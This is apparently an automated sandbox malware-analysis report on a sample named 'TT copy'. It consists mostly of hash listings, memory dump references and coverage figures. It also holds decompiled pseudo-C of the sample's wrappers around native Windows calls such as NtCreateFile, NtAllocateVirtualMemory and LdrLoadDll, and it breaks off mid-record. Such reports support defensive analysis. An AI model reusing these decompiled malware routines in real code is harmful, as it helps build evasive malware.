                                                                                                            • Instruction ID: db7e13f3e6ea740ffaf171e47ae7aa2f60e5c44978ec79c71b6acb8128cc51fb
                                                                                                            • Opcode Fuzzy Hash: 5459823691c02d0f075711e35eaeecf120df28cf1e8ef0e20548d4b5cf7b27c3
                                                                                                            • Instruction Fuzzy Hash: C8E0D8718582898FC750D7B8D5456FD7FD05F06125F1422C98955576D3DF340A43C242
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f9df4f741d42eae6d1861c8edb2fc835fbf7156aa00b79198fe0ecc7b5ffcaae
                                                                                                            • Instruction ID: d048a278873e4109ae68f868c0a68b2c671e8f88b9bc704c5fe305900b7c5d22
                                                                                                            • Opcode Fuzzy Hash: f9df4f741d42eae6d1861c8edb2fc835fbf7156aa00b79198fe0ecc7b5ffcaae
                                                                                                            • Instruction Fuzzy Hash: 5DE09A74E0520CEFCB94DFA9D585A9DFBF5EB48304F20C1AA991893345E7359A42CF81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 78068b54860b6105d87e5522a04bce6060035998ed0cf6649d52e996cdd11625
                                                                                                            • Instruction ID: 5e2497b1ce6e0f53b6458b009c498a8fa877fa14fd3241a58b41feef154d65f7
                                                                                                            • Opcode Fuzzy Hash: 78068b54860b6105d87e5522a04bce6060035998ed0cf6649d52e996cdd11625
                                                                                                            • Instruction Fuzzy Hash: 44F03478908398CFDB50EF24D894798BBF1BB4A314F04A1D9D989AB386D3709A81CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2fb792dfc0e3da90f75937d3dcd803fd5aca69959ac0e846fc751b7629734a9a
                                                                                                            • Instruction ID: 58828ef1cf0045e7900bc4b3b8c5784b300dca58bb5bbb5b5c695dfcc246cce8
                                                                                                            • Opcode Fuzzy Hash: 2fb792dfc0e3da90f75937d3dcd803fd5aca69959ac0e846fc751b7629734a9a
                                                                                                            • Instruction Fuzzy Hash: 18E08C30C2520CDFC744DFA8D4856EDBFF8AB08205F1021A9990893241EB340B41CB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 775e30b4ccf7cfea21b68d75a9ec51a4f15e03e547526ca97e177eee071ee232
                                                                                                            • Instruction ID: 5e3dc3a727ec1d3cae2e5be8efbde86009dd0b9d7982ac53afc7532d75c9d9b8
                                                                                                            • Opcode Fuzzy Hash: 775e30b4ccf7cfea21b68d75a9ec51a4f15e03e547526ca97e177eee071ee232
                                                                                                            • Instruction Fuzzy Hash: 9FE09274D0630CEFCB54DFAAE44469DBBB6EF48319F1081AAD908A3344E7359A91CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 45c256d7eddfb7a5e14168118d784b6046bd1609349a18c106216867f3d841be
                                                                                                            • Instruction ID: 8c0a1e699bcf90fda37a9b3f5afe11bfb5c66e5b1f254c79247c4974f6a3c8c5
                                                                                                            • Opcode Fuzzy Hash: 45c256d7eddfb7a5e14168118d784b6046bd1609349a18c106216867f3d841be
                                                                                                            • Instruction Fuzzy Hash: F4E09274E1920CEFCB54DFA8E54569DBFB5FB48305F1082AAD808A3354EB355A41CF81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cbad52cdb38f1fbbb01567f332a7c8e4d2f18a13e0938c35af372ad406ab6075
                                                                                                            • Instruction ID: 7874a42a1d2be131d1c5921d8ce0aa42eaf7391a5721e168ff1b09982c67bc5c
                                                                                                            • Opcode Fuzzy Hash: cbad52cdb38f1fbbb01567f332a7c8e4d2f18a13e0938c35af372ad406ab6075
                                                                                                            • Instruction Fuzzy Hash: F2E0EC70D2520CDFCB40DFA8D84569DBFB8AB49205F1051AAAC08D3241FB345A41CB82
                                                                                                            Uniqueness

                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5813732bf40fcfad41510b4716e3f95e10f9c5cfed6d0cb545747e83c3c5b715
                                                                                                            • Instruction ID: 7014357abf25f08b047e1299e2cf4f18c1b4e9cb5d9c943341151e6d29484d62
                                                                                                            • Opcode Fuzzy Hash: 5813732bf40fcfad41510b4716e3f95e10f9c5cfed6d0cb545747e83c3c5b715
                                                                                                            • Instruction Fuzzy Hash: 88413C71E15A18CFEB68CF6B8D4079AFAF7AFC9201F14D1FA840CA6255EB3449818F51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 52cd86245aed8ae8123e5a9de6bf1ad3d62a012ad74013ec8edab86f34dd4d62
                                                                                                            • Instruction ID: 168cd33ffb2e34d8996228fb0b565658dcb9c2a6bff6f3b2565aa837a95c1e06
                                                                                                            • Opcode Fuzzy Hash: 52cd86245aed8ae8123e5a9de6bf1ad3d62a012ad74013ec8edab86f34dd4d62
                                                                                                            • Instruction Fuzzy Hash: 59416371D05B598BEB5CCF6B9D4079AFAF3AFC9200F18C1FA844CAA265EB3405458F51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ecf892a97b246ced258ddb2086f3edb528e9ca7c3ed4a8d1dcecfdc26c7e67f
                                                                                                            • Instruction ID: 2cc40171af68b9b1c742aa6128fc0ed8de72cb7aad5fd6b5a0844e53d1925e97
                                                                                                            • Opcode Fuzzy Hash: 0ecf892a97b246ced258ddb2086f3edb528e9ca7c3ed4a8d1dcecfdc26c7e67f
                                                                                                            • Instruction Fuzzy Hash: 91415071E05A598BEB5CCF6BDD4079AFAF3AFC9205F14C1BA840CAB225EB3405858F51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:4.2%
                                                                                                            Dynamic/Decrypted Code Coverage:2.6%
                                                                                                            Signature Coverage:5.6%
                                                                                                            Total number of Nodes:622
                                                                                                            Total number of Limit Nodes:71

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 195 41a2da-41a2dc 196 41a339-41a371 NtCreateFile 195->196 197 41a2de 195->197 198 41a2e0-41a319 call 41af70 197->198 199 41a263-41a291 call 41af70 197->199
                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00409123,?,00415817,00409123,FFFFFFFF,?,?,FFFFFFFF,00409123,00415817,?,00409123,00000060,00000000,00000000), ref: 0041A36D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 221 40a150-40a16c 222 40a174-40a179 221->222 223 40a16f call 41cdc0 221->223 224 40a17b-40a17e 222->224 225 40a17f-40a18d call 41d1e0 222->225 223->222 228 40a19d-40a1ae call 41b510 225->228 229 40a18f-40a19a call 41d460 225->229 234 40a1b0-40a1c4 LdrLoadDll 228->234 235 40a1c7-40a1ca 228->235 229->228 234->235
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040A150(void* _a4, intOrPtr _a8) {
                                                                                                            				char* _v8;
                                                                                                            				struct _EXCEPTION_RECORD _v12;
                                                                                                            				struct _OBJDIR_INFORMATION _v16;
                                                                                                            				char _v536;
                                                                                                            				void* _t15;
                                                                                                            				struct _OBJDIR_INFORMATION _t17;
                                                                                                            				struct _OBJDIR_INFORMATION _t18;
                                                                                                            				void* _t30;
                                                                                                            				void* _t31;
                                                                                                            				void* _t32;
                                                                                                            
                                                                                                            				_v8 =  &_v536;
                                                                                                            				_t15 = E0041CDC0(_a8,  &_v12, 0x104, _a8);
                                                                                                            				_t31 = _t30 + 0xc;
                                                                                                            				if(_t15 != 0) {
                                                                                                            					_t17 = E0041D1E0(__eflags, _v8);
                                                                                                            					_t32 = _t31 + 4;
                                                                                                            					__eflags = _t17;
                                                                                                            					if(_t17 != 0) {
                                                                                                            						E0041D460( &_v12, 0);
                                                                                                            						_t32 = _t32 + 8;
                                                                                                            					}
                                                                                                            					_t18 = E0041B510(_v8);
                                                                                                            					_v16 = _t18;
                                                                                                            					__eflags = _t18;
                                                                                                            					if(_t18 == 0) {
                                                                                                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                            						return _v16;
                                                                                                            					}
                                                                                                            					return _t18;
                                                                                                            				} else {
                                                                                                            					return _t15;
                                                                                                            				}
                                                                                                            			}














                                                                                                            APIs
                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A1C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Load
                                                                                                            • String ID:
                                                                                                            • API String ID: 2234796835-0
                                                                                                            • Opcode ID: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                                                                                            • Instruction ID: 28ce5d3be8b252fe6ada86924bfdd1bfe597e1d717b1112511943715be3c05a4
                                                                                                            • Opcode Fuzzy Hash: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                                                                                            • Instruction Fuzzy Hash: F1015EB5E0020DBBDB10DBA1DC42FDEB7789B14308F0041AAE908AB281F634EB54CB95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 236 41a320-41a371 call 41af70 NtCreateFile
                                                                                                            C-Code - Quality: 35%
                                                                                                            			E0041A320(void* __ebx, signed int __ecx, intOrPtr* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                            				void* _v3;
                                                                                                            				intOrPtr _t16;
                                                                                                            				long _t22;
                                                                                                            
                                                                                                            				_t16 = _a4;
                                                                                                            				 *(__ebx + 0x6a561448) =  *(__ebx + 0x6a561448) | __ecx;
                                                                                                            				 *__edx =  *__edx - __ecx;
                                                                                                            				_push(__ecx);
                                                                                                            				_t4 = _t16 + 0xc5c; // 0xc5c
                                                                                                            				_push(_t16);
                                                                                                            				E0041AF70(__ecx);
                                                                                                            				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                            				return _t22;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00409123,?,00415817,00409123,FFFFFFFF,?,?,FFFFFFFF,00409123,00415817,?,00409123,00000060,00000000,00000000), ref: 0041A36D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                                                                                            • Instruction ID: a2aaebe10041835da89b7de23d426bb534e4eab43eabe5d401869e8ba4a1940d
                                                                                                            • Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                                                                                            • Instruction Fuzzy Hash: FEF06DB6215208AFCB48DF89DC85EEB77ADAF8C754F118248BA0997251D630F8518BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 239 41a324-41a336 240 41a33c-41a371 NtCreateFile 239->240 241 41a337 call 41af70 239->241 241->240
                                                                                                            C-Code - Quality: 38%
                                                                                                            			E0041A324(void* __eax, void* __ebx, signed int __ecx, intOrPtr* __edx) {
                                                                                                            				long _t21;
                                                                                                            				void* _t35;
                                                                                                            
                                                                                                            				_t15 = __eax;
                                                                                                            				_t36 = _t35 + 1;
                                                                                                            				 *(__ebx + 0x6a561448) =  *(__ebx + 0x6a561448) | __ecx;
                                                                                                            				 *__edx =  *__edx - __ecx;
                                                                                                            				_push(__ecx);
                                                                                                            				_t3 = _t15 + 0xc5c; // 0xc5c
                                                                                                            				_push(__eax);
                                                                                                            				E0041AF70(__ecx);
                                                                                                            				_t21 = NtCreateFile( *(_t35 + 0xd),  *(_t35 + 0x11),  *(_t36 + 0x14),  *(_t36 + 0x18),  *(_t36 + 0x1c),  *(_t36 + 0x20),  *(_t36 + 0x24),  *(_t36 + 0x28),  *(_t36 + 0x2c),  *(_t36 + 0x30),  *(_t36 + 0x34)); // executed
                                                                                                            				return _t21;
                                                                                                            			}






                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00409123,?,00415817,00409123,FFFFFFFF,?,?,FFFFFFFF,00409123,00415817,?,00409123,00000060,00000000,00000000), ref: 0041A36D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 99a1d5391ea82f851d1abd71c55384e86c8545d0e2b67006a244c5a1e4af7ed2
                                                                                                            • Instruction ID: 955a3615a58bc84b70413108b0a317e7b122ba80def8ab38860059ab301b7d99
                                                                                                            • Opcode Fuzzy Hash: 99a1d5391ea82f851d1abd71c55384e86c8545d0e2b67006a244c5a1e4af7ed2
                                                                                                            • Instruction Fuzzy Hash: F6F0F4B2204149AFCB08CF98DC84CEB77ADEF8C354B05824CFA1C93201D630E851CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 242 41a3d0-41a419 call 41af70 NtReadFile
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E0041A3D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                            				void* _t18;
                                                                                                            				intOrPtr* _t27;
                                                                                                            
                                                                                                            				_t13 = _a4;
                                                                                                            				_t27 = _a4 + 0xc64;
                                                                                                            				E0041AF70( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
                                                                                                            				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                                                                                                            				return _t18;
                                                                                                            			}






                                                                                                            APIs
                                                                                                            • NtReadFile.NTDLL(004159D2,5D9515B3,FFFFFFFF,00415691,?,?,004159D2,?,00415691,FFFFFFFF,5D9515B3,004159D2,?,00000000), ref: 0041A415
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                                                                                            • Instruction ID: 779a587cf63d30236cb0bbdb99b63125838c179a486f17d262a5a2bfd3bb36b4
                                                                                                            • Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                                                                                            • Instruction Fuzzy Hash: 15F0A4B6200208ABCB14DF99DC85EEB77ADAF8C754F118249BA0D97251D630E811CBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 245 41a500-41a53d call 41af70 NtAllocateVirtualMemory
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0041A500(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                            				long _t14;
                                                                                                            
                                                                                                            				_t3 = _a4 + 0xc7c; // 0x3c7c
                                                                                                            				E0041AF70( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
                                                                                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                            				return _t14;
                                                                                                            			}





                                                                                                            APIs
                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B1AD,?,0041B1AD,?,00000000,?,00003000,00000040,00409123,00000000), ref: 0041A539
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2167126740-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 261 41a44a-41a479 call 41af70 NtClose
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E0041A44A(void* __eax, signed int __ebx, void* __edx, void* _a4) {
                                                                                                            				intOrPtr _v0;
                                                                                                            				long _t13;
                                                                                                            
                                                                                                            				_push(__eax);
                                                                                                            				 *(__eax - 0x1374aaa3) =  *(__eax - 0x1374aaa3) ^ __ebx;
                                                                                                            				_t10 = _v0;
                                                                                                            				_t5 = _t10 + 0x14; // 0x56c29f0f
                                                                                                            				_t6 = _t10 + 0xc6c; // 0x409d8f
                                                                                                            				E0041AF70( *_t5, _v0, _t6,  *_t5, 0, 0x2c);
                                                                                                            				_t13 = NtClose(_a4); // executed
                                                                                                            				return _t13;
                                                                                                            			}






                                                                                                            APIs
                                                                                                            • NtClose.NTDLL(004159B0,?,?,004159B0,00409123,FFFFFFFF), ref: 0041A475
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close
                                                                                                            • String ID:
                                                                                                            • API String ID: 3535843008-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 264 41a450-41a466 265 41a46c-41a479 NtClose 264->265 266 41a467 call 41af70 264->266 266->265
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0041A450(intOrPtr _a4, void* _a8) {
                                                                                                            				long _t8;
                                                                                                            
                                                                                                            				_t5 = _a4;
                                                                                                            				_t2 = _t5 + 0x14; // 0x56c29f0f
                                                                                                            				_t3 = _t5 + 0xc6c; // 0x409d8f
                                                                                                            				E0041AF70( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                            				_t8 = NtClose(_a8); // executed
                                                                                                            				return _t8;
                                                                                                            			}





                                                                                                            APIs
                                                                                                            • NtClose.NTDLL(004159B0,?,?,004159B0,00409123,FFFFFFFF), ref: 0041A475
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close
                                                                                                            • String ID:
                                                                                                            • API String ID: 3535843008-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            • Instruction ID: 2dc5d94eff62656b207c47b7b319660fdcb026bb90dc74c4ec989dff475ae814
                                                                                                            • Opcode Fuzzy Hash: 390471051b62af089c5b932e802e2e9d5e7681fb36d3ef79262c347e6d1f6f17
                                                                                                            • Instruction Fuzzy Hash: 74900475311005030145F5DD47445474147F7D53D5351C031F1405550CD771DC717371
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 159cb15761a520992a512cb649e146ba7fd63a91ac3c952106d0eae63bab68b8
                                                                                                            • Instruction ID: b663a9abbd8d5de1eaebef70c063996db42f31aee4399bdb7346eff591beb5bf
                                                                                                            • Opcode Fuzzy Hash: 159cb15761a520992a512cb649e146ba7fd63a91ac3c952106d0eae63bab68b8
                                                                                                            • Instruction Fuzzy Hash: C69002A120200503414571998454656810AE7E0245B51C031E1404590DC56598917265
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 5b8406bcf68f3ff691abdc8bef45c09a3ce44396d91ec36e44170d7dcc43fd5f
                                                                                                            • Instruction ID: 30504a350be699a03dc1527b1d3d108a73d0fe55b07905047e997c1a2dd6c43e
                                                                                                            • Opcode Fuzzy Hash: 5b8406bcf68f3ff691abdc8bef45c09a3ce44396d91ec36e44170d7dcc43fd5f
                                                                                                            • Instruction Fuzzy Hash: 6090027120100903D14065D994486864105E7E0345F51D021A5414555EC6A598917271
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 15d60e2d50952a0f858a32f2779d353257df4310ad85969b4874ee7ac31156f8
                                                                                                            • Instruction ID: a862e29af7f023698c12ac0925b18d653de49a7bc7c1d1a493d8f587176f3ad4
                                                                                                            • Opcode Fuzzy Hash: 15d60e2d50952a0f858a32f2779d353257df4310ad85969b4874ee7ac31156f8
                                                                                                            • Instruction Fuzzy Hash: 1F90026921300503D1C07199944864A4105E7D1246F91D425A0405558CC95598696361
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 25cdb727cc1920d774a5c49ced5205d747f5f06cfbfa911ed2459f9e0b9c5993
                                                                                                            • Instruction ID: 294b46ed2582126cbeca27fdc52ff301d9ced3d556758448fa962004d69a85fb
                                                                                                            • Opcode Fuzzy Hash: 25cdb727cc1920d774a5c49ced5205d747f5f06cfbfa911ed2459f9e0b9c5993
                                                                                                            • Instruction Fuzzy Hash: C590026130100503D180719994586468105F7E1345F51D021E0804554CD95598566362
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
